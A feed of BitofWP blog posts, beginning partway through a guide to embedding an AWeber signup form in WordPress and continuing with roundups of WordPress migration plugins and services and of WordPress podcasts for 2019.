After choosing a suitable template, you will be able to customize the header, footer, input fields, maybe even add a counter, or anything you can think of. You can even add a custom field, although Name and Email will do for most Sign Up Forms.

When you get your form to look like exactly like you want it to, click on the blue button title ‘Go To Step 2’. This is where you will be configuring the Thank You page and a message for those who already subscribed before. There’s a number of options to choose from: a page on your site, a basic message made by AWeber, etc. After that, click on the ‘Go To Step 3’ button.

The last step offers you three options:

Installing the form yourself by getting the JavaScript/HTML snippet
Sending an email to your designer/developer containing the instructions
Getting a link to an AWeber page where your visitors will be redirected to sign up

Choose option number 1 and you will get a code that looks similar to this:

You will need to copy the code from the window and paste it somewhere on your site, which will be explained in the last step.

3. Add the form to your WordPress site

The first decision you should make is where will the form be located. Should it be on every page in the header, footer or sidebar? Or should it have a dedicated page? This is entirely up to you, though people put the forms in their sidebars using widgets. Adding the form to the header of the site is probably not the best idea, from the design standpoint. Plus it will probably require custom coding of your theme and therefore it will not be covered in this article. We will discuss how to place the form in sidebar, footer and on a dedicated page.

Placing the form in the sidebar/footer

Most popular themes have widget areas assigned to both sidebar and footer. To access the widget settings, log in to your wp-admin dashboard, go to ‘Appearances’ and choose ‘Widgets’. Then find a widget called Custom HTML (or Raw HTML, depending on the theme).

Expand the widget and copy the snippet code from the previous step and then click ‘Save’.

Check any of your pages that have sidebar area and you should see the form. The procedure is the same for adding the form in the footer, you just need to select different widget area.

Placing the form on the page

If you want to have a dedicated page on your site with a form on it, the process is more or less the same. In this case, you won’t be using the widget areas. Instead, you will be pasting the form directly on the page.

Just create a new page and paste the code snippet you got from AWeber in the text editor. Publish the page and the form will appear as the main content.

In case you are using a page builder (like WP Bakery Page Builder, Elementor or similar), add a ‘Custom HTML’ or ‘Raw HTML’ block and paste the snippet code inside.

As you can see, adding an AWeber form to your WordPress site is pretty simple. If you followed these instructions accurately, the form should be set up correctly. If you encounter any difficulties with the form itself, you can contact the AWeber support. In case you have any issues with your WordPress site feel free to check out our WordPress Support Services and contact us if you need assistance with anything.

The post How to Add an AWeber email signup form to your WordPress website appeared first on WordPress Support Services by BitofWP.

8 High-Quality WordPress Migration Plugins and Services

BitofWP — Thu, 16 May 2019 23:48:37 +0000

Setting up a WordPress website is easy to do, even if you have no experience. On the other hand, moving your site from one place to another can be a major headache, even if you do know what you’re doing.

There are many reasons why you might need to migrate your WordPress website. For example, maybe you’re moving it from local development to a production server or copying it from your server to place on a client’s server. Or, maybe you’re changing web hosts, need to create a copy for an upcoming project, or just need a backup of your site.

No matter the reason, the important thing is that there are no mistakes made during the move that affect the design, functionality, and content of your site. And while manually migrating a website is doable, it’s time-consuming and puts you at risk for making irreparable mistakes.

If you want to save yourself the stress of manually migrating your WordPress website, try using a WordPress migration plugin or service instead. These solutions make website migration, cloning, database moves, and backups seamless. They also prevent data loss and give you a faster, better way to move entire websites – without error.

Take a look at this roundup of the highest-quality WordPress migration plugins and services in the market to date and enjoy the convenience they provide when it comes to moving your site.

WordPress Migration Plugins

There are plenty of free and premium WordPress migration plugins in the market to help you copy, backup, migrate, and clone your website.

1. Duplicator

Duplicator is by far one of the most favored migration plugins to date. It helps with not only migrating your WordPress site, but copying, moving, cloning, and creating backups, making it a flexible solution. This is probably why it boasts 4.9 out of 5 stars and has over 1 million active installations.

This migration plugin bundles your site’s plugins, themes, content, database, and WordPress files into a neat little zip file called a package. This process is what makes moving your site so easy.

When you have your site all packages up, all you have to do is upload it to your new server and let Duplicator set everything up for you. That said, this plugin does require that you have a little bit of technical knowledge. If this worries you, you should look into a more user-friendly solution.

Duplicator is a free WordPress migration plugin that will get the job done for you. However, the pro version of this plugin does offer features such as:

Automatic backups and cloud storage (Dropbox, Google Drive, Amazon S3, and more)
Multisite migrations
Connection to the cPanel from installer
Email notifications
Multi-threaded to support large sites and databases
Professional support

Price: FREE (pro version starts at $59)

2. WP Migrate DB

The WP Migrate DB plugin makes the hardest part about migrating your WordPress site, moving the database, easier. It exports your WordPress database as a MySQL data dump, runs a find and replace function on URLs and file paths, and handles serialized data before saving as an SQL file.

From there, you’ll need to import the SQL file to your database, replacing the existing one. It also gives users more control over migration and backups, rather than just making a simple clone of the original site.

If this sounds kind of complicated, that’s because it is. Because of that, this migration plugin is best suited for developers that need to migrate sites from production sites to local installs or locally developed sites to staging or production sites. Additionally, this plugin is based solely around moving your database. If you need a solution that does everything for you, you’ll need to look elsewhere.

The pro version of this plugin has features like the ability to push and pull databases, database backups prior to migration, migration pause and resume functionality, multisite migrations, and priority email support.

Price: FREE (pro version starts at $99)

3. UpdraftPlus

UpdraftPlus is a simple backup and restore plugin. All you have to do is manually backup your site or schedule automatic backups and let the plugin save your site in the cloud (Dropbox, Google Drive, email, Amazon S3, and more). When you need to restore your site, all it takes is one click.

If you want to migrate your site using UpdraftPlus, you’ll need to either upgrade to the premium version of this plugin or purchase the separate UpdraftPlus Migrator plugin. If you upgrade to UpdraftPlus Premium, you’ll get the Migrator Add-On as well as features like:

Incremental backups
Advanced reporting
Database encryption
Multisite support
Easy duplications and migrations
Additional cloud storage options

With the UpdraftPlus Migrator Add-On, you’ll be able to clone and migrate unlimited WordPress sites, access database tools to remove mentions of your old website from the database, and receive 12 months of priority support.

Price: FREE (UpdraftPlus Premium starts at $70, Migrator Add-On starts at $30)

4. All-in-One WP Migration

All-in-One WP Migration is a free WordPress migration plugin that is designed to help you move your site to a new server or domain name. It moves the database, media files, plugins, and themes, and requires zero technical knowledge making it one of the most user-friendly migration solutions on this list. There’s also a neat find and replace database feature that makes it easier to repair broken files and links after the move.

This comprehensive solution comes with the ability to:

Work on all web hosting platforms and operating systems
Bypass all upload restrictions set by hosting providers by importing/exporting in time chunks
Function regardless of PHP version (2 and higher)
Support MySQL and MySQLI
Backup and migrate site via mobile device

There are premium extensions you can use to extend your migration abilities such as Dropbox storage, Multisite support, unlimited import sizes, FTP export/import, and more.

Price: FREE (premium extensions vary in price)

5. BackupBuddy

BackupBuddy is the only WordPress migration plugin on this list that isn’t free. However, that doesn’t mean it doesn’t come with it’s fair share of features. Not only does it give website owners an easy way to schedule daily, weekly, or even monthly backups, because of the way it backs sites up, migration is easy too.

This simple plugin backs up your entire WordPress installation so you have a copy of your database and WordPress files and puts it into a convenient zip file. This file can then be saved to your favorite off-site cloud storage, including Amazon S3, BackupBuddy Stash, Dropbox, and more. In addition, you can have your backups sent straight to you email.

With BackupBuddy, you also get these amazing features:

Easy site restore
Customizable backups
Email notifications
Free malware checks
Built-in server tools for detecting hosting issues
Interactive site directory map
Database scanning and repair
Customizable backup storage limits

Price: Plans start at $80

WordPress Migration Services

If you don’t want to install another plugin on your website, or need help with migrating your site, there are several reputable WordPress migration services you can use.

1. Valet.io

Valet.io is a high-level WordPress migration service that can handle websites of all kinds and sizes. In addition to helping you with hosting and site migrations, they provide professional level support when it comes marketing, speed optimization, usability, and site security.

Take a look at some of Valet.io’s best services:

A/B testing
SEO optimization
Content marketing
eCommerce shop and product support
Site design and development

This solution is perfect for those that need professional migration services and help with other WordPress related projects.

Price: Must contact for more information

2. AccessWP

AccessWP provides WordPress users with unlimited WordPress support for a monthly fee. For example, you can have the experienced team of U.S based developers help with things like:

Web maintenance
Speed optimization
Web design
SEO optimization
Site security
Emergencies
Conversion optimization

Of course, migrating your WordPress website is included in this long list of tasks that you get with AccessWP. The point is, once your site is moved, AccessWP provides other services to help you continue growing your blog or online website.

Price: Plans start at $99/month

3. BitofWP

We would be remiss not to mention our own WordPress support services in this roundup of WordPress migration services: BitofWP. As a WordPress support Agency specializing in security audits and malware removal, we also pride ourselves in providing additional WordPress services such as:

SSL certificate set up and conversion from HTTP to HTTPS
Content creation and updates on both posts and pages
Plugin, theme, and content migration when you decide to use Gutenberg
Website cloning from HTML, Joomla, Drupal, PHP, .NET, and static sites
Web maintenance: site backups, updates, security checks, monthly reports, site repairs, speed optimization, and spam removal

Lastly, we do WordPress site migrations from old hosts to new and non-WordPress sites to WordPress ones. Each site migration comes with one month of support, page and post moves, theme migrations, menu and image migrations, onsite SEO setup, SEO permalink setup, spam protection, and 302 redirects. And to top it off, all work is done in our own hosting environment before the migration to reduce error and ensure a seamless move.

Price: Must contact for more information for a site migration (maintenance plans start at $19/month)

And there you have it! Some of the most reliable WordPress migration plugins and services available to WordPress users today. The solution you choose will depend on your budget and individual needs. But with a little research, you’ll find the plugin or service that will help you migrate your WordPress website with ease.

The post 8 High-Quality WordPress Migration Plugins and Services appeared first on WordPress Support Services by BitofWP.

The Top 10 Most Promising WordPress Podcasts for 2019

BitofWP — Sat, 27 Apr 2019 09:32:06 +0000

Being an avid WordPress user is just the beginning. After all, there is always breaking news, updates, trending designs, coding techniques, tools, and more to learn about.

But in between work and play, how are you supposed to keep up without making a huge time commitment?

The answer is WordPress podcasts.

Introduced on iTunes in 2005, podcasts have come a long way. In fact, there are currently over 700,000 podcasts and 29 million episodes for people to listen to; and those numbers continue to rise.

People love listening to podcasts because they offer the flexibility to do other things while listening to something they’re interested in.

And when it comes to WordPress podcasts, there’s something for developers, designers, and users alike. But just because podcasts give you an easier way to keep up with the WordPress world doesn’t mean you automatically know which ones to tune into.

That’s why we’re here to help you out. We’ve rounded up the top 10 most promising WordPress podcasts for 2019 so you can narrow down your search, find a podcast that suits your needs, and start listening right away.

1. WP Elevation

WP Elevation not only brings the main host Troy Dean to the speaker to share his insight on scaling your online business, creating high-level goals, and being grateful, but multiple other hosts to switch things up and add different perspectives.

Perfect for anyone looking to build recurring revenue (with or without WordPress), this podcast is broken into easy sections so you can find exactly what you’re looking for. These sections include processes, getting clients, recurring revenue, growth, tech, and balance.

Recent episodes include:

2. Kitchen Sink WP

Adam Silver, a longtime WordPress user that wants to share the value of WordPress and its community with others, hosts Kitchen Sink WP. His episode topics range from event roundups to plugin reviews, and freelance business tips to starting an online business.

He also interviews prominent people in the WordPress industry to share their insight with listeners. WordPress users of all skill levels and interests have something to gain from this weekly podcast.

Recent episodes include:

3. Matt Report

Rather than focus on nitty-gritty web development tools, processes, or coding tips related to WordPress, the Matt Report focuses on giving real people insight into how they can run their WordPress businesses better than ever.

You can expect regular guest speakers to share actionable advice and practical tips with each episode you listen to. And the best part is, WordPress developers, designers, writers, consultants, and shop owners can all learn something new by tuning in and seeing what the next Matt Report has to say.

Recent episodes include:

4. Post Status Draft

Post Status Draft started out as an aggregator site of helpful WordPress resources. It then turned into a blog that published original, WordPress-related content. After that, Post Status Draft turned into a podcast that released 1-2 new podcasts a month with news, tips, tools, and interviews for people to listen to.

The neat thing about this WordPress podcast is that is deals with both the development and business side of WordPress. In fact, it’s one of the only WordPress podcasts that still discuss all things WordPress.

Recent episodes include:

5. Agency Trailblazer

This cool WordPress podcast is setting out to build a solid community of WordPress developers and agencies. Focusing on important topics like effective client management, greater revenue generation, and better business practices, the hosts at Agency Trailblazer want to help you succeed while building your WordPress agency.

Adding to that, they want to make sure that your agency not only continues to grow but that there’s leftover time to spend with friends and family too.

Recent episodes include:

6. WPwatercooler

WPwatercooler is one of the oldest and most respected WordPress podcasts around. It includes a nice mixture of live and pre-recorded content that airs weekly and is headed by Jason Tucker, a successful web services company owner that enjoys using WordPress.

In the episodes, WordPress enthusiasts talk about news, real-life applications and successes, and even the technical side of WordPress, which many podcasts don’t do. Jason also likes to interview top WordPress leaders and find out how they feel WordPress is changing businesses and our lives.

Recent episodes include:

7. WordPress Weekly

Jeff Chandler and John James Jacoby of WP Tavern bring WordPress Weekly to you. This podcast is a great source of WordPress news, anything related to the WordPress core or Automattic, and marketing topics. And every episode is recorded live so the flow is organic and easy to follow along.

WordPress Weekly’s hosts aim to show people how to create a recognizable brand using customer loyalty and technical knowledge of the WordPress CMS. Plus, they like to share how leadership can impact the productivity of a business.

Recent episodes include:

8. Hello, WP!

Hello, WP! is a new WordPress podcast that takes a new spin on delivering you everything WordPress related. Hosted by the Dailey brothers, Micah and Josh, episodes reveal how Micah (a new WordPress user) learns the basics and what the WordPress community is all about.

The thing is, though Micah is a new user, experienced WordPress developers have a lot to benefit from listening in. The conversations remind people how it was to be a beginner in the WordPress space and how different things are today.

Recent episodes include:

9. Women in WP

It’s important to remember that WordPress is a diverse community that includes powerful women too! That’s why Women in WP is a part of this promising list of WordPress podcasts to check out this year.

There aren’t a lot of women hosting podcasts in general, but this podcast airs bi-monthly episodes that are about women who blog, design, develop, and market in the WordPress community and how they use WordPress in their businesses and personal lives.

Recent episodes include:

10. WP Roundtable

WP Roundtable is a unique WordPress podcast that includes a roundtable, or panel, of WordPress experts and guests to cover topics like development, hosting, themes, performance, and business.

They have an extensive lineup of interviewees, and a convenient schedule you can check out if you’re looking for someone in particular. Adding to that, WP Roundtable has been podcasting since 2014, so you’ll never have a shortage of material to listen to.

Recent episodes include:

And there you have it! The most promising WordPress podcasts to check out this year.

Whether you want to brush up on your development skills, learn about the latest WordPress news, or find new ways to acquire more customers and generate more money with your online shop, there’s a podcast just waiting for you to click play. And don’t worry, you can take your WordPress podcasts with you so you stay up to date on all things WordPress, while getting everything else done you need to.

Featured Photo by Dan LeFebvre on Unsplash

The post The Top 10 Most Promising WordPress Podcasts for 2019 appeared first on WordPress Support Services by BitofWP.